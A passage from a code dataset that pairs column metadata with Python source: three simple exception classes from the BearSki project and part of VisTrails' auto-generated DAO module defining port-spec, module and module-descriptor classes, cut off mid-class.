hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1ce26c983b25795b8344d1afedd8fab6e03cc8ff
| 463
|
py
|
Python
|
src/BearSki/utils/errors.py
|
Sirius1942/BearSki
|
bdc75d6f06946896e2128f1c095b9baf9863b124
|
[
"MIT"
] | 13
|
2019-12-10T09:07:45.000Z
|
2021-09-08T01:24:22.000Z
|
src/BearSki/utils/errors.py
|
Sirius1942/BearSki
|
bdc75d6f06946896e2128f1c095b9baf9863b124
|
[
"MIT"
] | 1
|
2020-05-06T01:43:50.000Z
|
2020-05-06T01:44:46.000Z
|
build/lib/BearSki/utils/errors.py
|
Sirius1942/BearSki
|
bdc75d6f06946896e2128f1c095b9baf9863b124
|
[
"MIT"
] | 6
|
2020-01-07T07:07:42.000Z
|
2021-06-04T03:38:19.000Z
|
#获取参数异常
class ArgmentError(Exception):
def __init__(self, expression, message):
self.expression = expression
self.message = message
#读取配置文件异常
class SettingFileError(Exception):
def __init__(self, expression, message):
self.expression = expression
self.message = message
class DataBaseError(Exception):
def __init__(self, expression, message):
self.expression = expression
self.message = message
| 20.130435
| 44
| 0.688985
| 44
| 463
| 6.977273
| 0.272727
| 0.273616
| 0.156352
| 0.19544
| 0.771987
| 0.771987
| 0.771987
| 0.771987
| 0.771987
| 0.771987
| 0
| 0
| 0.228942
| 463
| 22
| 45
| 21.045455
| 0.859944
| 0.030238
| 0
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
1ce9691c438083a52850c38dd26867a1d4a1ae2a
| 320,510
|
py
|
Python
|
vistrails/db/versions/v0_9_5/domain/auto_gen.py
|
remram44/VisTrails-mybinder
|
ee7477b471920d738f3ac430932f01901b56ed44
|
[
"BSD-3-Clause"
] | 83
|
2015-01-05T14:50:50.000Z
|
2021-09-17T19:45:26.000Z
|
vistrails/db/versions/v0_9_5/domain/auto_gen.py
|
remram44/VisTrails-mybinder
|
ee7477b471920d738f3ac430932f01901b56ed44
|
[
"BSD-3-Clause"
] | 254
|
2015-01-02T20:39:19.000Z
|
2018-11-28T17:16:44.000Z
|
vistrails/db/versions/v0_9_5/domain/auto_gen.py
|
remram44/VisTrails-mybinder
|
ee7477b471920d738f3ac430932f01901b56ed44
|
[
"BSD-3-Clause"
] | 40
|
2015-04-17T16:46:36.000Z
|
2021-09-28T22:43:24.000Z
|
###############################################################################
##
## Copyright (C) 2014-2016, New York University.
## Copyright (C) 2011-2014, NYU-Poly.
## Copyright (C) 2006-2011, University of Utah.
## All rights reserved.
## Contact: contact@vistrails.org
##
## This file is part of VisTrails.
##
## "Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are met:
##
## - Redistributions of source code must retain the above copyright notice,
## this list of conditions and the following disclaimer.
## - Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimer in the
## documentation and/or other materials provided with the distribution.
## - Neither the name of the New York University nor the names of its
## contributors may be used to endorse or promote products derived from
## this software without specific prior written permission.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
## AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
## THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
## PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
## CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
## EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
## PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
## OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
## WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
## OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
## ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
##
###############################################################################
"""generated automatically by auto_dao.py"""
from __future__ import division
import copy
class DBPortSpec(object):
vtType = 'portSpec'
def __init__(self, id=None, name=None, type=None, optional=None, sort_key=None, sigstring=None):
self._db_id = id
self._db_name = name
self._db_type = type
self._db_optional = optional
self._db_sort_key = sort_key
self._db_sigstring = sigstring
self.is_dirty = True
self.is_new = True
def __copy__(self):
return DBPortSpec.do_copy(self)
def do_copy(self, new_ids=False, id_scope=None, id_remap=None):
cp = DBPortSpec(id=self._db_id,
name=self._db_name,
type=self._db_type,
optional=self._db_optional,
sort_key=self._db_sort_key,
sigstring=self._db_sigstring)
# set new ids
if new_ids:
new_id = id_scope.getNewId(self.vtType)
if self.vtType in id_scope.remap:
id_remap[(id_scope.remap[self.vtType], self.db_id)] = new_id
else:
id_remap[(self.vtType, self.db_id)] = new_id
cp.db_id = new_id
# recreate indices and set flags
if not new_ids:
cp.is_dirty = self.is_dirty
cp.is_new = self.is_new
return cp
@staticmethod
def update_version(old_obj, trans_dict, new_obj=None):
if new_obj is None:
new_obj = DBPortSpec()
class_dict = {}
if new_obj.__class__.__name__ in trans_dict:
class_dict = trans_dict[new_obj.__class__.__name__]
if 'id' in class_dict:
res = class_dict['id'](old_obj, trans_dict)
new_obj.db_id = res
elif hasattr(old_obj, 'db_id') and old_obj.db_id is not None:
new_obj.db_id = old_obj.db_id
if 'name' in class_dict:
res = class_dict['name'](old_obj, trans_dict)
new_obj.db_name = res
elif hasattr(old_obj, 'db_name') and old_obj.db_name is not None:
new_obj.db_name = old_obj.db_name
if 'type' in class_dict:
res = class_dict['type'](old_obj, trans_dict)
new_obj.db_type = res
elif hasattr(old_obj, 'db_type') and old_obj.db_type is not None:
new_obj.db_type = old_obj.db_type
if 'optional' in class_dict:
res = class_dict['optional'](old_obj, trans_dict)
new_obj.db_optional = res
elif hasattr(old_obj, 'db_optional') and old_obj.db_optional is not None:
new_obj.db_optional = old_obj.db_optional
if 'sort_key' in class_dict:
res = class_dict['sort_key'](old_obj, trans_dict)
new_obj.db_sort_key = res
elif hasattr(old_obj, 'db_sort_key') and old_obj.db_sort_key is not None:
new_obj.db_sort_key = old_obj.db_sort_key
if 'sigstring' in class_dict:
res = class_dict['sigstring'](old_obj, trans_dict)
new_obj.db_sigstring = res
elif hasattr(old_obj, 'db_sigstring') and old_obj.db_sigstring is not None:
new_obj.db_sigstring = old_obj.db_sigstring
new_obj.is_new = old_obj.is_new
new_obj.is_dirty = old_obj.is_dirty
return new_obj
def db_children(self, parent=(None,None), orphan=False):
return [(self, parent[0], parent[1])]
def db_deleted_children(self, remove=False):
children = []
return children
def has_changes(self):
if self.is_dirty:
return True
return False
def __get_db_id(self):
return self._db_id
def __set_db_id(self, id):
self._db_id = id
self.is_dirty = True
db_id = property(__get_db_id, __set_db_id)
def db_add_id(self, id):
self._db_id = id
def db_change_id(self, id):
self._db_id = id
def db_delete_id(self, id):
self._db_id = None
def __get_db_name(self):
return self._db_name
def __set_db_name(self, name):
self._db_name = name
self.is_dirty = True
db_name = property(__get_db_name, __set_db_name)
def db_add_name(self, name):
self._db_name = name
def db_change_name(self, name):
self._db_name = name
def db_delete_name(self, name):
self._db_name = None
def __get_db_type(self):
return self._db_type
def __set_db_type(self, type):
self._db_type = type
self.is_dirty = True
db_type = property(__get_db_type, __set_db_type)
def db_add_type(self, type):
self._db_type = type
def db_change_type(self, type):
self._db_type = type
def db_delete_type(self, type):
self._db_type = None
def __get_db_optional(self):
return self._db_optional
def __set_db_optional(self, optional):
self._db_optional = optional
self.is_dirty = True
db_optional = property(__get_db_optional, __set_db_optional)
def db_add_optional(self, optional):
self._db_optional = optional
def db_change_optional(self, optional):
self._db_optional = optional
def db_delete_optional(self, optional):
self._db_optional = None
def __get_db_sort_key(self):
return self._db_sort_key
def __set_db_sort_key(self, sort_key):
self._db_sort_key = sort_key
self.is_dirty = True
db_sort_key = property(__get_db_sort_key, __set_db_sort_key)
def db_add_sort_key(self, sort_key):
self._db_sort_key = sort_key
def db_change_sort_key(self, sort_key):
self._db_sort_key = sort_key
def db_delete_sort_key(self, sort_key):
self._db_sort_key = None
def __get_db_sigstring(self):
return self._db_sigstring
def __set_db_sigstring(self, sigstring):
self._db_sigstring = sigstring
self.is_dirty = True
db_sigstring = property(__get_db_sigstring, __set_db_sigstring)
def db_add_sigstring(self, sigstring):
self._db_sigstring = sigstring
def db_change_sigstring(self, sigstring):
self._db_sigstring = sigstring
def db_delete_sigstring(self, sigstring):
self._db_sigstring = None
def getPrimaryKey(self):
return self._db_id
class DBModule(object):
vtType = 'module'
def __init__(self, id=None, cache=None, name=None, namespace=None, package=None, version=None, tag=None, location=None, functions=None, annotations=None, portSpecs=None):
self._db_id = id
self._db_cache = cache
self._db_name = name
self._db_namespace = namespace
self._db_package = package
self._db_version = version
self._db_tag = tag
self.db_deleted_location = []
self._db_location = location
self.db_deleted_functions = []
self.db_functions_id_index = {}
if functions is None:
self._db_functions = []
else:
self._db_functions = functions
for v in self._db_functions:
self.db_functions_id_index[v.db_id] = v
self.db_deleted_annotations = []
self.db_annotations_id_index = {}
self.db_annotations_key_index = {}
if annotations is None:
self._db_annotations = []
else:
self._db_annotations = annotations
for v in self._db_annotations:
self.db_annotations_id_index[v.db_id] = v
self.db_annotations_key_index[v.db_key] = v
self.db_deleted_portSpecs = []
self.db_portSpecs_id_index = {}
self.db_portSpecs_name_index = {}
if portSpecs is None:
self._db_portSpecs = []
else:
self._db_portSpecs = portSpecs
for v in self._db_portSpecs:
self.db_portSpecs_id_index[v.db_id] = v
self.db_portSpecs_name_index[(v.db_name,v.db_type)] = v
self.is_dirty = True
self.is_new = True
def __copy__(self):
return DBModule.do_copy(self)
def do_copy(self, new_ids=False, id_scope=None, id_remap=None):
cp = DBModule(id=self._db_id,
cache=self._db_cache,
name=self._db_name,
namespace=self._db_namespace,
package=self._db_package,
version=self._db_version,
tag=self._db_tag)
if self._db_location is not None:
cp._db_location = self._db_location.do_copy(new_ids, id_scope, id_remap)
if self._db_functions is None:
cp._db_functions = []
else:
cp._db_functions = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_functions]
if self._db_annotations is None:
cp._db_annotations = []
else:
cp._db_annotations = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_annotations]
if self._db_portSpecs is None:
cp._db_portSpecs = []
else:
cp._db_portSpecs = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_portSpecs]
# set new ids
if new_ids:
new_id = id_scope.getNewId(self.vtType)
if self.vtType in id_scope.remap:
id_remap[(id_scope.remap[self.vtType], self.db_id)] = new_id
else:
id_remap[(self.vtType, self.db_id)] = new_id
cp.db_id = new_id
# recreate indices and set flags
cp.db_functions_id_index = dict((v.db_id, v) for v in cp._db_functions)
cp.db_annotations_id_index = dict((v.db_id, v) for v in cp._db_annotations)
cp.db_annotations_key_index = dict((v.db_key, v) for v in cp._db_annotations)
cp.db_portSpecs_id_index = dict((v.db_id, v) for v in cp._db_portSpecs)
cp.db_portSpecs_name_index = dict(((v.db_name,v.db_type), v) for v in cp._db_portSpecs)
if not new_ids:
cp.is_dirty = self.is_dirty
cp.is_new = self.is_new
return cp
@staticmethod
def update_version(old_obj, trans_dict, new_obj=None):
if new_obj is None:
new_obj = DBModule()
class_dict = {}
if new_obj.__class__.__name__ in trans_dict:
class_dict = trans_dict[new_obj.__class__.__name__]
if 'id' in class_dict:
res = class_dict['id'](old_obj, trans_dict)
new_obj.db_id = res
elif hasattr(old_obj, 'db_id') and old_obj.db_id is not None:
new_obj.db_id = old_obj.db_id
if 'cache' in class_dict:
res = class_dict['cache'](old_obj, trans_dict)
new_obj.db_cache = res
elif hasattr(old_obj, 'db_cache') and old_obj.db_cache is not None:
new_obj.db_cache = old_obj.db_cache
if 'name' in class_dict:
res = class_dict['name'](old_obj, trans_dict)
new_obj.db_name = res
elif hasattr(old_obj, 'db_name') and old_obj.db_name is not None:
new_obj.db_name = old_obj.db_name
if 'namespace' in class_dict:
res = class_dict['namespace'](old_obj, trans_dict)
new_obj.db_namespace = res
elif hasattr(old_obj, 'db_namespace') and old_obj.db_namespace is not None:
new_obj.db_namespace = old_obj.db_namespace
if 'package' in class_dict:
res = class_dict['package'](old_obj, trans_dict)
new_obj.db_package = res
elif hasattr(old_obj, 'db_package') and old_obj.db_package is not None:
new_obj.db_package = old_obj.db_package
if 'version' in class_dict:
res = class_dict['version'](old_obj, trans_dict)
new_obj.db_version = res
elif hasattr(old_obj, 'db_version') and old_obj.db_version is not None:
new_obj.db_version = old_obj.db_version
if 'tag' in class_dict:
res = class_dict['tag'](old_obj, trans_dict)
new_obj.db_tag = res
elif hasattr(old_obj, 'db_tag') and old_obj.db_tag is not None:
new_obj.db_tag = old_obj.db_tag
if 'location' in class_dict:
res = class_dict['location'](old_obj, trans_dict)
new_obj.db_location = res
elif hasattr(old_obj, 'db_location') and old_obj.db_location is not None:
obj = old_obj.db_location
new_obj.db_add_location(DBLocation.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_location') and hasattr(new_obj, 'db_deleted_location'):
for obj in old_obj.db_deleted_location:
n_obj = DBLocation.update_version(obj, trans_dict)
new_obj.db_deleted_location.append(n_obj)
if 'functions' in class_dict:
res = class_dict['functions'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_function(obj)
elif hasattr(old_obj, 'db_functions') and old_obj.db_functions is not None:
for obj in old_obj.db_functions:
new_obj.db_add_function(DBFunction.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_functions') and hasattr(new_obj, 'db_deleted_functions'):
for obj in old_obj.db_deleted_functions:
n_obj = DBFunction.update_version(obj, trans_dict)
new_obj.db_deleted_functions.append(n_obj)
if 'annotations' in class_dict:
res = class_dict['annotations'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_annotation(obj)
elif hasattr(old_obj, 'db_annotations') and old_obj.db_annotations is not None:
for obj in old_obj.db_annotations:
new_obj.db_add_annotation(DBAnnotation.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_annotations') and hasattr(new_obj, 'db_deleted_annotations'):
for obj in old_obj.db_deleted_annotations:
n_obj = DBAnnotation.update_version(obj, trans_dict)
new_obj.db_deleted_annotations.append(n_obj)
if 'portSpecs' in class_dict:
res = class_dict['portSpecs'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_portSpec(obj)
elif hasattr(old_obj, 'db_portSpecs') and old_obj.db_portSpecs is not None:
for obj in old_obj.db_portSpecs:
new_obj.db_add_portSpec(DBPortSpec.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_portSpecs') and hasattr(new_obj, 'db_deleted_portSpecs'):
for obj in old_obj.db_deleted_portSpecs:
n_obj = DBPortSpec.update_version(obj, trans_dict)
new_obj.db_deleted_portSpecs.append(n_obj)
new_obj.is_new = old_obj.is_new
new_obj.is_dirty = old_obj.is_dirty
return new_obj
def db_children(self, parent=(None,None), orphan=False):
children = []
if self._db_location is not None:
children.extend(self._db_location.db_children((self.vtType, self.db_id), orphan))
if orphan:
self._db_location = None
to_del = []
for child in self.db_functions:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_function(child)
to_del = []
for child in self.db_annotations:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_annotation(child)
to_del = []
for child in self.db_portSpecs:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_portSpec(child)
children.append((self, parent[0], parent[1]))
return children
def db_deleted_children(self, remove=False):
children = []
children.extend(self.db_deleted_location)
children.extend(self.db_deleted_functions)
children.extend(self.db_deleted_annotations)
children.extend(self.db_deleted_portSpecs)
if remove:
self.db_deleted_location = []
self.db_deleted_functions = []
self.db_deleted_annotations = []
self.db_deleted_portSpecs = []
return children
def has_changes(self):
if self.is_dirty:
return True
if self._db_location is not None and self._db_location.has_changes():
return True
for child in self._db_functions:
if child.has_changes():
return True
for child in self._db_annotations:
if child.has_changes():
return True
for child in self._db_portSpecs:
if child.has_changes():
return True
return False
def __get_db_id(self):
return self._db_id
def __set_db_id(self, id):
self._db_id = id
self.is_dirty = True
db_id = property(__get_db_id, __set_db_id)
def db_add_id(self, id):
self._db_id = id
def db_change_id(self, id):
self._db_id = id
def db_delete_id(self, id):
self._db_id = None
def __get_db_cache(self):
return self._db_cache
def __set_db_cache(self, cache):
self._db_cache = cache
self.is_dirty = True
db_cache = property(__get_db_cache, __set_db_cache)
def db_add_cache(self, cache):
self._db_cache = cache
def db_change_cache(self, cache):
self._db_cache = cache
def db_delete_cache(self, cache):
self._db_cache = None
def __get_db_name(self):
return self._db_name
def __set_db_name(self, name):
self._db_name = name
self.is_dirty = True
db_name = property(__get_db_name, __set_db_name)
def db_add_name(self, name):
self._db_name = name
def db_change_name(self, name):
self._db_name = name
def db_delete_name(self, name):
self._db_name = None
def __get_db_namespace(self):
return self._db_namespace
def __set_db_namespace(self, namespace):
self._db_namespace = namespace
self.is_dirty = True
db_namespace = property(__get_db_namespace, __set_db_namespace)
def db_add_namespace(self, namespace):
self._db_namespace = namespace
def db_change_namespace(self, namespace):
self._db_namespace = namespace
def db_delete_namespace(self, namespace):
self._db_namespace = None
def __get_db_package(self):
return self._db_package
def __set_db_package(self, package):
self._db_package = package
self.is_dirty = True
db_package = property(__get_db_package, __set_db_package)
def db_add_package(self, package):
self._db_package = package
def db_change_package(self, package):
self._db_package = package
def db_delete_package(self, package):
self._db_package = None
def __get_db_version(self):
return self._db_version
def __set_db_version(self, version):
self._db_version = version
self.is_dirty = True
db_version = property(__get_db_version, __set_db_version)
def db_add_version(self, version):
self._db_version = version
def db_change_version(self, version):
self._db_version = version
def db_delete_version(self, version):
self._db_version = None
def __get_db_tag(self):
return self._db_tag
def __set_db_tag(self, tag):
self._db_tag = tag
self.is_dirty = True
db_tag = property(__get_db_tag, __set_db_tag)
def db_add_tag(self, tag):
self._db_tag = tag
def db_change_tag(self, tag):
self._db_tag = tag
def db_delete_tag(self, tag):
self._db_tag = None
def __get_db_location(self):
return self._db_location
def __set_db_location(self, location):
self._db_location = location
self.is_dirty = True
db_location = property(__get_db_location, __set_db_location)
def db_add_location(self, location):
self._db_location = location
def db_change_location(self, location):
self._db_location = location
def db_delete_location(self, location):
if not self.is_new:
self.db_deleted_location.append(self._db_location)
self._db_location = None
def __get_db_functions(self):
return self._db_functions
def __set_db_functions(self, functions):
self._db_functions = functions
self.is_dirty = True
db_functions = property(__get_db_functions, __set_db_functions)
def db_get_functions(self):
return self._db_functions
def db_add_function(self, function):
self.is_dirty = True
self._db_functions.append(function)
self.db_functions_id_index[function.db_id] = function
def db_change_function(self, function):
self.is_dirty = True
found = False
for i in xrange(len(self._db_functions)):
if self._db_functions[i].db_id == function.db_id:
self._db_functions[i] = function
found = True
break
if not found:
self._db_functions.append(function)
self.db_functions_id_index[function.db_id] = function
def db_delete_function(self, function):
self.is_dirty = True
for i in xrange(len(self._db_functions)):
if self._db_functions[i].db_id == function.db_id:
if not self._db_functions[i].is_new:
self.db_deleted_functions.append(self._db_functions[i])
del self._db_functions[i]
break
del self.db_functions_id_index[function.db_id]
def db_get_function(self, key):
for i in xrange(len(self._db_functions)):
if self._db_functions[i].db_id == key:
return self._db_functions[i]
return None
def db_get_function_by_id(self, key):
return self.db_functions_id_index[key]
def db_has_function_with_id(self, key):
return key in self.db_functions_id_index
def __get_db_annotations(self):
return self._db_annotations
def __set_db_annotations(self, annotations):
self._db_annotations = annotations
self.is_dirty = True
db_annotations = property(__get_db_annotations, __set_db_annotations)
def db_get_annotations(self):
return self._db_annotations
def db_add_annotation(self, annotation):
self.is_dirty = True
self._db_annotations.append(annotation)
self.db_annotations_id_index[annotation.db_id] = annotation
self.db_annotations_key_index[annotation.db_key] = annotation
def db_change_annotation(self, annotation):
self.is_dirty = True
found = False
for i in xrange(len(self._db_annotations)):
if self._db_annotations[i].db_id == annotation.db_id:
self._db_annotations[i] = annotation
found = True
break
if not found:
self._db_annotations.append(annotation)
self.db_annotations_id_index[annotation.db_id] = annotation
self.db_annotations_key_index[annotation.db_key] = annotation
def db_delete_annotation(self, annotation):
self.is_dirty = True
for i in xrange(len(self._db_annotations)):
if self._db_annotations[i].db_id == annotation.db_id:
if not self._db_annotations[i].is_new:
self.db_deleted_annotations.append(self._db_annotations[i])
del self._db_annotations[i]
break
del self.db_annotations_id_index[annotation.db_id]
del self.db_annotations_key_index[annotation.db_key]
def db_get_annotation(self, key):
for i in xrange(len(self._db_annotations)):
if self._db_annotations[i].db_id == key:
return self._db_annotations[i]
return None
def db_get_annotation_by_id(self, key):
return self.db_annotations_id_index[key]
def db_has_annotation_with_id(self, key):
return key in self.db_annotations_id_index
def db_get_annotation_by_key(self, key):
return self.db_annotations_key_index[key]
def db_has_annotation_with_key(self, key):
return key in self.db_annotations_key_index
def __get_db_portSpecs(self):
return self._db_portSpecs
def __set_db_portSpecs(self, portSpecs):
self._db_portSpecs = portSpecs
self.is_dirty = True
db_portSpecs = property(__get_db_portSpecs, __set_db_portSpecs)
def db_get_portSpecs(self):
return self._db_portSpecs
def db_add_portSpec(self, portSpec):
self.is_dirty = True
self._db_portSpecs.append(portSpec)
self.db_portSpecs_id_index[portSpec.db_id] = portSpec
self.db_portSpecs_name_index[(portSpec.db_name,portSpec.db_type)] = portSpec
def db_change_portSpec(self, portSpec):
self.is_dirty = True
found = False
for i in xrange(len(self._db_portSpecs)):
if self._db_portSpecs[i].db_id == portSpec.db_id:
self._db_portSpecs[i] = portSpec
found = True
break
if not found:
self._db_portSpecs.append(portSpec)
self.db_portSpecs_id_index[portSpec.db_id] = portSpec
self.db_portSpecs_name_index[(portSpec.db_name,portSpec.db_type)] = portSpec
def db_delete_portSpec(self, portSpec):
self.is_dirty = True
for i in xrange(len(self._db_portSpecs)):
if self._db_portSpecs[i].db_id == portSpec.db_id:
if not self._db_portSpecs[i].is_new:
self.db_deleted_portSpecs.append(self._db_portSpecs[i])
del self._db_portSpecs[i]
break
del self.db_portSpecs_id_index[portSpec.db_id]
del self.db_portSpecs_name_index[(portSpec.db_name,portSpec.db_type)]
def db_get_portSpec(self, key):
for i in xrange(len(self._db_portSpecs)):
if self._db_portSpecs[i].db_id == key:
return self._db_portSpecs[i]
return None
def db_get_portSpec_by_id(self, key):
return self.db_portSpecs_id_index[key]
def db_has_portSpec_with_id(self, key):
return key in self.db_portSpecs_id_index
def db_get_portSpec_by_name(self, key):
return self.db_portSpecs_name_index[key]
def db_has_portSpec_with_name(self, key):
return key in self.db_portSpecs_name_index
def getPrimaryKey(self):
return self._db_id
class DBModuleDescriptor(object):
vtType = 'module_descriptor'
def __init__(self, id=None, name=None, package=None, namespace=None, version=None, base_descriptor_id=None, portSpecs=None):
self._db_id = id
self._db_name = name
self._db_package = package
self._db_namespace = namespace
self._db_version = version
self._db_base_descriptor_id = base_descriptor_id
self.db_deleted_portSpecs = []
self.db_portSpecs_id_index = {}
self.db_portSpecs_name_index = {}
if portSpecs is None:
self._db_portSpecs = []
else:
self._db_portSpecs = portSpecs
for v in self._db_portSpecs:
self.db_portSpecs_id_index[v.db_id] = v
self.db_portSpecs_name_index[(v.db_name,v.db_type)] = v
self.is_dirty = True
self.is_new = True
def __copy__(self):
return DBModuleDescriptor.do_copy(self)
def do_copy(self, new_ids=False, id_scope=None, id_remap=None):
cp = DBModuleDescriptor(id=self._db_id,
name=self._db_name,
package=self._db_package,
namespace=self._db_namespace,
version=self._db_version,
base_descriptor_id=self._db_base_descriptor_id)
if self._db_portSpecs is None:
cp._db_portSpecs = []
else:
cp._db_portSpecs = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_portSpecs]
# set new ids
if new_ids:
new_id = id_scope.getNewId(self.vtType)
if self.vtType in id_scope.remap:
id_remap[(id_scope.remap[self.vtType], self.db_id)] = new_id
else:
id_remap[(self.vtType, self.db_id)] = new_id
cp.db_id = new_id
if hasattr(self, 'db_base_descriptor_id') and ('module_descriptor', self._db_base_descriptor_id) in id_remap:
cp._db_base_descriptor_id = id_remap[('module_descriptor', self._db_base_descriptor_id)]
# recreate indices and set flags
